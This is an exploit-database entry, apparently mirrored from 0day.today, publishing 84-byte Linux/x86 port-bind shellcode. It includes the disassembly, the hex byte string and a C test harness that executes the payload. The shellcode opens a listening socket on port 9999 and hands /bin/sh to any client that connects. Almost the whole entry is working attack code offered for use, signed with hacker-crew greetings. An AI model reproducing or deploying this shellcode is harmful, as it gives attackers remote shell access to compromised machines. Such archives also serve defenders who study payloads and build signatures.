Lucene search
K

linux/x86 - port bind shellcode 84 bytes

🗓️ 27 Jan 2012 00:00:00Reported by TrOoNType 
zdt
 zdt
🔗 0day.today👁 26 Views

shellcode for linux/x86 port bind, 84 byte

Code
# Title : Shellcode - porT bind (84 bytes)
# Author :TrOoN
# E-mail : [email protected]  | www.facebook.com/fysl.fyslm
# Home : city 617 logts  : Draria . algeria
# Web Site : www.1337day.com
# platform :Linux/x86       | uBuntU Fr
# Type : local exploit /SHELL CODE  /ETc...
###




 *
 * 8048304:    6a 66                    push   $0x66
 * 8048306:    58                       pop    %eax
 * 8048307:    6a 01                    push   $0x1
 * 8048309:    5b                       pop    %ebx
 * 804830a:    99                       cltd   
 * 804830b:    52                       push   %edx
 * 804830c:    53                       push   %ebx
 * 804830d:    6a 02                    push   $0x2
 * 804830f:    89 e1                    mov    %esp,%ecx
 * 8048311:    cd 80                    int    $0x80
 * 8048313:    52                       push   %edx
 * 8048314:    43                       inc    %ebx
 * 8048315:    68 ff 02 0a 93           push   $0x930a02ff
 * 804831a:    89 e1                    mov    %esp,%ecx
 * 804831c:    6a 10                    push   $0x10
 * 804831e:    51                       push   %ecx
 * 804831f:    50                       push   %eax
 * 8048320:    89 e1                    mov    %esp,%ecx
 * 8048322:    89 c6                    mov    %eax,%esi
 * 8048324:    b0 66                    mov    $0x66,%al
 * 8048326:    cd 80                    int    $0x80
 * 8048328:    43                       inc    %ebx
 * 8048329:    43                       inc    %ebx
 * 804832a:    b0 66                    mov    $0x66,%al
 * 804832c:    cd 80                    int    $0x80
 * 804832e:    52                       push   %edx
 * 804832f:    56                       push   %esi
 * 8048330:    89 e1                    mov    %esp,%ecx
 * 8048332:    43                       inc    %ebx
 * 8048333:    b0 66                    mov    $0x66,%al
 * 8048335:    cd 80                    int    $0x80
 * 8048337    89 d9            mov    %ebx,%ecx
 * 8048339:    89 c3                    mov    %eax,%ebx
 * 804833b:    b0 3f                    mov    $0x3f,%al
 * 804833d:    49                       dec    %ecx
 * 804833e:    cd 80                    int    $0x80
 * 8048340:    41                       inc    %ecx
 * 8048341:    e2 f8                    loop   804833b
 * 8048343:    52                       push   %edx
 * 8048344:    68 6e 2f 73 68           push   $0x68732f6e
 * 8048349:    68 2f 2f 62 69           push   $0x69622f2f
 * 804834e:    89 e3                    mov    %esp,%ebx
 * 8048350:    52                       push   %edx
 * 8048351:    53                       push   %ebx
 * 8048352:    89 e1                    mov    %esp,%ecx
 * 8048354:    b0 0b                    mov    $0xb,%al
 * 8048356:    cd 80                    int    $0x80
 *
*/

#include <stdio.h>
#define L_PORT "\x0a\x93"    /* Port 9999 */

char shellcode[] = "\x6a\x66\x58\x6a\x01\x5b\x99\x52\x53\x6a\x02\x89"
                   "\xe1\xcd\x80\x52\x43\x68\xff\x02"L_PORT"\x89\xe1"
                   "\x6a\x10\x51\x50\x89\xe1\x89\xc6\xb0\x66\xcd\x80"
                   "\x43\x43\xb0\x66\xcd\x80\x52\x56\x89\xe1\x43\xb0"
                   "\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80"
                   "\x41\xe2\xf8\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f"
                   "\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";

main()
{
    void (*f)();
    (long) f = &shellcode;
    fprintf(stdout, "lenght: %d bytes\n", sizeof(shellcode) - 1);
    f();
}



################################################ TrOon ######################################

team mosta - exploit-bd - security-ray - hacker fire - elite_troJn - hacker-1420 - bResCo-Dz -
turkhackteam.NET - aLl algeRian hackXOR


Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Jan 2012 00:00Current
7.4High risk
Vulners AI Score7.4
26